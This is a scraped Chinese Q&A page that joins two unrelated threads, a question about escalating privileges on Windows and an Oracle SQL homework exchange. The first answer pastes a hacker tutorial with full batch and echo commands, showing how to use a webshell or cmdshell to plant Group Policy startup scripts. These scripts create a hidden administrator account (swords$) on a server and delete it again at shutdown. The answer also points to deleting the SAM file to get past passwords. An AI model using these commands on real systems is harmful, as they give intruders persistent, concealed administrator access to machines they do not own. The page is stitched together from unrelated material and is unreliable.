各位好，那位能帮我解决一下权限问题。

Posted 2023-03-18

我是受限用户，管理员用户密码忘了，如何提升我的权限，或是破解管理员密码。不要用什么光盘的。

总结的提升管理员权限8法，现在我们利用启动脚本和批处理在获得shell的情况下提升权限第9法: 启动脚本法！！首家批漏啊，大家可得看好了，我尽量废话少说，言简意赅的表述。
注：启动脚本是邀请用户登录之前运行的批文件,它的功能类似于Win9X和DOS中的自动执行批处理文件autoexec.bat,由于脚本是在windows登陆之前运行,所以我们可以修改脚本内容来对系统进行设置,如启动一个后门程序,添加一个管理员帐号,修改管理员帐号等等,随你想吧.嘎嘎..
本文首先介绍通过webshell添加一个隐藏帐号(毕竟这才是大家最关心的:)),然后具体讲解一下出现问题后的解决方法.如何添加一个帐号?
一.如果你可以直接写文件,如用海洋.
（1） 首先，我们用海洋编写了一个新建管理员的批处理文件swords1.bat,如下:
net user swords$Content$nbsp;eviloctal /add
net localgroup administrators swords$Content$nbsp;/add
这个批处理文件加了一个管理员名为swords$,密码为eviloctal的隐藏帐户，将文件swords1.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup"下.
(注意：c：\winnt是系统目录，如果系统盘不是c盘，请相应修改为系统目录即可.在本机中查看，你也许找不到GroupPolicy\Machine\Scripts\Startup这个文件夹,可以选择工具/文件夹选项/查看/单击显示所有文件和文件夹.在海洋中用fso可以显示所有文件就不必多此一举了。)
（2）接下来编写一个删除管理员的批处理文件swords2.bat,很简单，一句话即可，如下: net user swords$Content$nbsp;/del
这个批处理文件删除一个管理员名为swords$的隐藏帐户，将文件swords2.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown"下.
（3）编写一个启动/关机脚本配置文件******s.ini
（注意：******s是默认的配置文件名，不能改名！）如下:
[Startup]
0CmdLine=swords1.bat
0Parameters=
[Shutdown]
0CmdLine=swords2.bat
0Parameters=
将文件******s.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
二.如果你有一个cmdshell,有echo的权限就可以了,这样添加:
(1)echo一个swords1.vbs启动时用的文件
echo on error resume next> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \swords1.vbs
echo net user swords$Content$nbsp;eviloctal /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
echo net localgroup administrators swords$Content$nbsp;/add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
注意:第一行一定要用’>’,这样才能删除原数据.
(2)echo一个swords2.vbs关闭时用的脚本文件
echo net user swords$Content$nbsp;/del> C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\swords2.vbs
(3)编写一个启动/关机脚本配置文件******s.ini
echo [Startup] > C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
echo 0CmdLine=swords1.vbs >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
echo 0Parameters= >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
echo [Shutdown] >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
echo 0CmdLine=swords2.vbs>>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
echo 0Parameters=>>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini
将文件******s.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
最后，等待服务器重新启动计算机或自己强制其启动(手段很多啊)。然后你就等着玩吧。
注意：本方法使用时，须服务器已经指派了计算机启动脚本,否则本方法可能不成功。
三．如果你是本机，或已经连接了对方的3389，但是只有普通用户权限，怎么办？
在启用计算机启动/关机脚本前,必须进行指派.指派计算机启动/关机脚本需要通过组策略MMC（管理控制台）管理单元进行：
（1） 开始/运行/MMC,打开微软控制台
（2） 按ctrl+M键，打开添加/删除管理单元窗口，单击添加。
（3） 在"添加独立管理单元"对话框内选择"组策略",点击"添加"按钮.
（4） 择缺省的"本地计算机"组策略对象/完成/确定/确定，关闭窗口。
（5） 在生成的“本地计算机”策略中打开计算机配置/Windows设置/脚本(启动/关闭)"节点,双击"启动"或"关机"项目设置计算机启动或关机时使用的脚本，单击浏览加如您要启动的脚本文件，确定。
（6）设置完毕,保存后退出组策略MMC管理单元。等组策略刷新后,这些脚本就会在计算机启动和关机时起作用。
注意：你也可以直接打开gpedit.msc, 依次展开计算机配置/Windows设置/脚本(启动/关闭),然后添加一个启动脚本。然后依次展开“计算机配置/管理模板/系统/登陆，将“显示启动脚本的运行状态”启用。重新启动之后看看吧，打开cmd，输入net user swords$显示详细的信息，噶噶，多了一个用户吧。 参考技术A 快速恢复Windows XP管理员密码若干技巧
技巧1：删除SAM文件来恢复密码 大家知道，Windows XP的密码存放在系统所在的WindowsSystem32Config下的SAM文件中，SAM文件即账号密码数据库文件。当我们登录系统的时候，系统会与Config中的SAM自动校对，当发现密码和用户名与SAM文件中的加密数据符合时，你才能顺利登录；如果错误则无法登......
http://Windows.chinaitlab.com/backup/392147.html

oracle scott用户几张表的关联查询，谁能帮我把这些解决一下，悬赏100，谢谢各位了

4、 列出受雇日期早于其直接上级的所有员工的编号、姓名、部门名称、部门位置、部门人数。
5、 列出部门名称和这些部门的员工信息（数量、平均工资），同时列出那些没有员工的部门。
6、 列出所有“CLERK”（办事员）的姓名及其部门名称，部门的人数，工资等级。
7、 列出最低薪金大于1500的各种工作及此从事此工作的全部雇员人数及所在部门名称、位置、平均工资。
8、 列出在部门“SALES”（销售部）工作的员工的姓名、基本工资、雇佣日期、部门名称，假定不知道销售部的部门编号。
9、 列出薪金高于公司平均薪金的所有员工，所在部门，上级领导，公司的工资等级。
10、 列出与“SCOTT”从事相同工作的所有员工及部门名称，部门人数。
11、 列出公司各个工资等级雇员的数量、平均工资。
12、 列出薪金高于在部门30工作的所有员工的薪金的员工姓名和薪金、部门名称。
13、 列出在每个部门工作的员工数量、平均工资和平均服务期限。
14、 列出所有员工的姓名、部门名称和工资。
15、 列出所有部门的详细信息和部门人数。
16、 列出各种工作的最低工资及从事此工作的雇员姓名。
17、 列出各个部门的MANAGER（经理）的最低薪金、姓名、部门名称、部门人数。
18、 列出所有员工的年工资，所在部门名称，按年薪从低到高排序。
19、 查出某个员工的上级主管及所在部门名称，并要求出这些主管中的薪水超过3000
20、 求出部门名称中，带‘S’字符的部门员工的、工资合计、部门人数。
21、 给任职日期超过30年或者在87年

参考技术A 没有表结构阿 。。。追问

orcale中scott用户中自带的四张表其中的三张

参考技术B 要什么？SQL语句?追问

是的，查询语句

追答

周末给出

追问

谢谢您，可是到了周末我估计我也已经有了答案了

追答

呵呵，现在手头没有oracle，到时候再说吧

追问

那也十分感谢您的积极回答

参考技术C 是不是说雇员等等的表，emp里面有smith这个人的？追问

是的，主要是emp和dept两个表，salgrade表偶尔用到

追答

题也太多了，你会几道哪些不会帮你做，现在还在+班coding类

追问

现在17,18,19已经做出来了，其他的我还在努力，其中4、5、6、7我想了半天也做不出来

追答

现在帮你写4567

追问

谢谢谢谢，太麻烦您了

追答

4、select a.empno 雇员编号,
a.ename 雇员名称,
(select b.dname from dept b where b.deptno = a.deptno) 部门名称,
(select c.loc from dept c where c.deptno = a.deptno) 部门位置
from emp a, emp b
where a.mgr = b.empno
and a.hiredate < b.hiredate

追问

4，5,6,7,8.10,11,17
就剩下这几道题了
其他的题我都基本都搞定了

追答

太多了，没有那么多时间弄今天

追问

那好吧
那也感谢您
您还在加班吧？真是辛苦了
我无法表示我对您的感谢
只能把悬赏提到了最高的200

本回答被提问者采纳